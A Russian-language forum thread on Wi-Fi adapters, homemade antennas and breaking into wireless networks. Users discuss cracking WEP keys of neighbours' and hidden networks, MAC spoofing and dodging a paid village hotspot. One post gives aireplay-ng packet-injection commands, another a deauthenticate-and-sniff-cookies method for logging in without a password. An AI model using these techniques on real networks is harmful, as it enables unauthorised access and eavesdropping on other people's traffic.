Насчет твоего адаптера я тоже нечего не понял,может быть дело в том что можно её использовать в вардрайвинге при помощи других систем ВТ3-4,линукс, а в windows возможно она и не будет работать!Короче нужно разбиратся!
Вообще мощьность сигнала зависит от адаптера и антены,есть адаптеры которые можно регулировать мощность так же ты можешь увеличить качество сигнала с помощью направленной всенаправленной антены! например мой писи адаптер с выходной мощьностью 18-15 dBm и стандартая антена дала мне мощности 2,5 dBi, я решил изготовить баначную и панельную антену. Баначная антена дала мне мощности в 12 dBi, панальная антена превзошла баначную и увеличила сигнал +7-9 dBi.а при регулировки самого адаптера в общей сложности при использовании панельной направленной антены Фа20 получился сигнал в 24,5 dBi.Без регулировки мощность была 21 dBi.А ещё я нашёл в инете антену которую хочу купить мощьностью в 30 dBi.Хочу взять инет в 3х км от меня.не забывая о том что также эту мощность можно потерять если сильно будет длинный кабель!максимум 2.5 м.
это не мой адаптер, я просто привел пример, у меня стандартный Intel Pro/Wireless, тут в теме про адаптеры говорят что его можно мол использовать, но там говорится о PCI вроде как и еще в скобках (HP)
мне же надо чтобы по крайней мере был стабильный сигнал на подоконнике или вообще в квартире....сетки халявные есть но как правило все почти с нулевым сигналом и варьируется. 3 км можно поймать сигнал ? наверное там где я живу с такой антенной количество сеток будет исчисляться сотнями =)

P.S. Что означает "Inject" , возможность подключения антенны ?

это не мой адаптер, я просто привел пример, у меня стандартный Intel Pro/Wireless, тут в теме про адаптеры говорят что его можно мол использовать, но там говорится о PCI вроде как и еще в скобках (HP)
мне же надо чтобы по крайней мере был стабильный сигнал на подоконнике или вообще в квартире....сетки халявные есть но как правило все почти с нулевым сигналом и варьируется. 3 км можно поймать сигнал ? наверное там где я живу с такой антенной количество сеток будет исчисляться сотнями =)
P.S. Что означает "Inject" , возможность подключения антенны ?
Поймать сигнал можно если будет мощная направленная антена и хорошо если ничего не будет припятствовать на пути! Да ты прав, inject есть возможность подключения внешней антены.

jurginsat
походу нема.. у меня тоже была.. как вариант мона самому модифицировать inf файл..

Здравствуйте товарищи!
У меня на стационарном компе дома Wi-fi адаптер ZyXEL G-220 EE, я все время им пользовался (да и сейчас пользуюсь) только как антенной для ловли сигнала от любимого соседа. Недавно узнал что он еще может работать в режиме Soft AP(точка доступа)... А теперь вопрос: Можно ли воспользоваться етим адаптаром чтобы создать сетку между ноутбуком и моим компом, для того чтобы поперекидывать на ноут мультимедийные файли, сотф, ну вообщем чтобы можно было лазить по ноуту с стационарного компа и наоборот.

Ну попробуй по примеру данной инструкции (http://i-on.ru/LabSolution/3221/)
Там на примере 2-х ноутов. У тебя будет аналогично.

Mini PCI-E = Express а то есть у меня слот экспресс

Народ.. помогите .. уж2 2ой раз пишу..

не получаю я ARP пакеты при ломе WEPа.. пробовал на 3945abg и 4965

На своей сетке пробовали.. Получит.. 1 -2 пакета.. и все.. Узаю бэтрэком 4ым..

aireplay-ng -3 -e <ТОЧКА ДОСТУПА> -h <СВОЙ МАК> mon0

либо

aireplay-ng -2 -e <ТОЧКА ДОСТУПА> -с <КЛИЕНТ> -h <СВОЙ МАК> mon0


при получении арп пакета надпись типо того..


READ 11891 packets (got 2 ARP requests and 2017 ACKs), sent 26646 packets... (499 pps)

И так далее пошло.. не могу понять..

при тесте проходит инжекты..

роутер стоит в метре.

пробовал и с маком клиента.. 2ая лопата стоит рядом..

Че за лажа ? ХЕЛП кто нибудь...

есть роутер длинк дир - 300, возможно ли как то увеличить дальность действия своими руками на метров 20?используя родную антену, может вскрыть ее....или фиг знает... :)

А почему не хочешь забацать антену другую?

http://news.cqham.ru/articles/discuss_show.phtml?id=284
http://forum.ixbt.com/topic.cgi?id=14:50466
http://tinylink.com/?lNgrHAeaZp


Вот сам мануал http://www.cqham.ru/cantenna.htm

Воть.. Попробуй..

Кто бы мне помог с Aireplayem!!! :(

Возможно ли зная пароль перехватить всё что качает пользователь WiFi интернета?

есть роутер длинк дир - 300, возможно ли как то увеличить дальность действия своими руками на метров 20?используя родную антену, может вскрыть ее....или фиг знает... :)
погугли, например
http://www.google.ru/search?hl=ru&newwindow=1&q=boost+wifi+signal&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=&aq=f&oq=

Возможно ли зная пароль перехватить всё что качает пользователь WiFi интернета?

почитай
http://www.tamos.ru/htmlhelp/commwifi/aboutcvwifi.htm
и еще
http://forum.antichat.ru/threadnav66892-1-10.html

Можно ли взломать Wi-Fi где нет шифрования (вход по паролю)?

Можно ли взломать Wi-Fi где нет шифрования (вход по паролю)?
ты имеешь ввиду, что пароль там в WEB интрерфейсе ? Если да, то меня тоже интересует =)

Можно ли взломать Wi-Fi где нет шифрования (вход по паролю)?

Да, можно, для этого тебе необхадимо дожаться пока на точке появиться клиент, деунтифицировать его(отключить) и при его реконекте перехватить траффик, напирмер с помощью wifizoo или commview, где уже будут cookies для входа без пароля)))

ты имеешь ввиду, что пароль там в WEB интрерфейсе ? Если да, то меня тоже интересует =)

Пароль надо вводить в настройках VPN соединения

Да, можно, для этого тебе необхадимо дожаться пока на точке появиться клиент, деунтифицировать его(отключить) и при его реконекте перехватить траффик, напирмер с помощью wifizoo или commview, где уже будут cookies для входа без пароля)))

Если я правильно понял надо длительно перехватывать трафик с помощью commview, но как вынуть cookies из CAP файла?

Пароль надо вводить в настройках VPN соединения
В таком случае никаких cookies не будет и перехватить пароль в открытом виде не получится.

Может есть какой нибудь другой способ получения пароля?

Отсканировал сеть через CommView for Wi FI, нашел скрытую сеть WEP, перехватил пакеты, взломал пароль, НО при подключении обычным способом к сети X (ее винда видет почему-то) не выбрасывает запроса пароля.. т.е. некуда вводить пароль! пишет "Не удалось подключится к сети".

Посмотрел подключенные к этой сети компы через CommView for Wi FI взял ихние МАС адреса и подменил ими свою сетевую карту - пох!! При подключении опять выдает ту же ошибку! "Не удалось подключится к сети" Как мне подключится к сети зная пароль но не имея возможности его ввода??

Всем привет! Помогите 'чайнику'!!!!! У меня в поселке месяц назад начали раздавать инет по Wi-Fi !!! 1000р за 256Кбит/с Мой ноут эту сеть отлично ловит!!! Я могу лазить как по локалке по другим компам, я могу общаться через Vypress Chat. А ВОТ ИНЕТ НЕ РАБОТАЕТ!!!! Как сделать??? Может кто подскажет??? шифрования нет!!!! Подключает без ключей!!! Помогите пожалуйста!!!!


P.S. С предложениями пойти и заплатить проходим мимо!

Отсканировал сеть через CommView for Wi FI, нашел скрытую сеть WEP, перехватил пакеты, взломал пароль, НО при подключении обычным способом к сети X (ее винда видет почему-то) не выбрасывает запроса пароля.. т.е. некуда вводить пароль! пишет "Не удалось подключится к сети".

Посмотрел подключенные к этой сети компы через CommView for Wi FI взял ихние МАС адреса и подменил ими свою сетевую карту - пох!! При подключении опять выдает ту же ошибку! "Не удалось подключится к сети" Как мне подключится к сети зная пароль но не имея возможности его ввода??

Привет, взломал ключ WEP, но точка доступа находится в скрытой сети и при коннекте не запрашиывает пароля... Есть CommView for WI FI как мне перехватывать траффик этой точки с помощью найденного ключа? Он не помещается в окно "Ключи WEP\WPA" или я не поминамаю как его туда прописывать? Вот сам ключ
"7E:6A:27:03:8F:77:92:21:1A:25:4B:07:A6" можете расписать как и куда его прописывать и как потом видеть расшифрованные пакеты? Спасибо!

Привет, взломал ключ WEP, но точка доступа находится в скрытой сети и при коннекте не запрашиывает пароля... Есть CommView for WI FI как мне перехватывать траффик этой точки с помощью найденного ключа? Он не помещается в окно "Ключи WEP\WPA" или я не поминамаю как его туда прописывать? Вот сам ключ
"7E:6A:27:03:8F:77:92:21:1A:25:4B:07:A6" можете расписать как и куда его прописывать и как потом видеть расшифрованные пакеты? Спасибо!
попробуй без двоеточий

попробуй без двоеточий

Попробовал, всё прошло, пишет пароль расшифрован.. а что дальше смотреть в отчетах? там всеравно сплошной HEX и нету ASCII

погугли, например



почитай

и еще

Почитал твою ссылку, есть расшифровка многих протоколов, НО как я могу видеть то что уже расшифровано? Ведь реально CommView пишет что пакет Decrypted (расшифрован) но показывает тот же HEX.. Как смотреть пакеты в людском виде - картинке, веб страничке, текстовом файле итп?

Может кто то всетаки знает??? Помогите 'чайнику'!!!!! У меня в поселке месяц назад начали раздавать инет по Wi-Fi !!! 1000р за 256Кбит/с Мой ноут эту сеть отлично ловит!!! Я могу лазить как по локалке по другим компам, я могу общаться через Vypress Chat. А ВОТ ИНЕТ НЕ РАБОТАЕТ!!!! Как сделать??? Может кто подскажет??? шифрования нет!!!! Подключает без ключей!!! Помогите пожалуйста!!!!

От чиво зависит сбор DATA пакетов? я ламаю через BT3 но очень медлено идет

От чиво зависит сбор DATA пакетов? я ламаю через BT3 но очень медлено идет

А зачем именно дата пакеты? А другие некатят?

Может кто то всетаки знает??? Помогите 'чайнику'!!!!! У меня в поселке месяц назад начали раздавать инет по Wi-Fi !!! 1000р за 256Кбит/с Мой ноут эту сеть отлично ловит!!! Я могу лазить как по локалке по другим компам, я могу общаться через Vypress Chat. А ВОТ ИНЕТ НЕ РАБОТАЕТ!!!! Как сделать??? Может кто подскажет??? шифрования нет!!!! Подключает без ключей!!! Помогите пожалуйста!!!!

DNS смотри

DNS смотри

А что его смотреть??? Он прописан!!! Все нормально! Но инет не работает!!!

Попробовал, всё прошло, пишет пароль расшифрован.. а что дальше смотреть в отчетах? там всеравно сплошной HEX и нету ASCII
ну попробуй калькулятором переведи из HEХ в десятичную систему, я то сам не знаю, ничего еще не пробовал расщифрововать, адаптер нормальный се не купить, так что я не в теме пока =)

добрый день. ноут показывает незащищенные сети. как к ним подключаться? на них может быть инет?

и еще ..... с бт3 достал wep-ключ. но не смог получить инет. подскажите братва что я не так делаю.... нажал "подключить" к точке что взломал (точно знаю что он раздает инет) ... но инета не получил.

Здравствуйте!
Такая задача к знатокам этого дела.
-На мачте судна имеется мащная антена с точка доступа DWL-2100AP в режиме «клиент»:192.168.0.50, 255.255.255.0;
- к ней витой парой конектиться ноутбук (где в свойсвах сетевой карты в альтернативной конфигурации TCP/IP v4 указаны 192.168.0.51 и 255.255.255.0, DNS и DHCP – 192.168.0.1; основная конфигурация TCP/IP – все получаем автоматом, если в основных настройках вбить 192.168.0.51...., то комп не подхватит IP, выдаваемый free wi-fi сетями в портах);
-в наличии есть роутер Sitecom WL-600(пока стоит без дела);
-по судну есть своя сеть, с сервером 192.168.100.101 и маршрутизаторами, раздающими адреса компам в сети 192.168.100.102......199 (здесь менять ничего нельзя).
Вопрос. Как организовать раздачу интернета, во-первых, ноутбуку и двум компьтерам сети( им выдан адрес судовой сетью в дипазоне192.168.100.102......199). Ноутбук может тоже кабелем конектиться к судовой сети(соответственно получать адрес внутри этой сети), но это по желанию.
Пожалуйста обьясните простыми словами. Спасибо.